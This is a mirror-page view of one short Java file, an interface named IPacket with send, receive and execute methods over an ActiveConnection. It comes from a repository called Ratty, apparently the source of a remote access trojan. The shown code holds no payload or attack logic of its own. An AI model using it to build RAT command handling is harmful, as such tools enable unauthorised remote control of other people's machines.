mirror of https://github.com/LucaBongiorni/Ratty
You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
15 lines
260 B
15 lines
260 B
package de.sogomn.rat.packet;
|
|
|
|
import de.sogomn.rat.ActiveConnection;
|
|
|
|
|
|
|
|
public interface IPacket {
|
|
|
|
void send(final ActiveConnection client);
|
|
|
|
void receive(final ActiveConnection client);
|
|
|
|
void execute(final ActiveConnection client);
|
|
|
|
}
|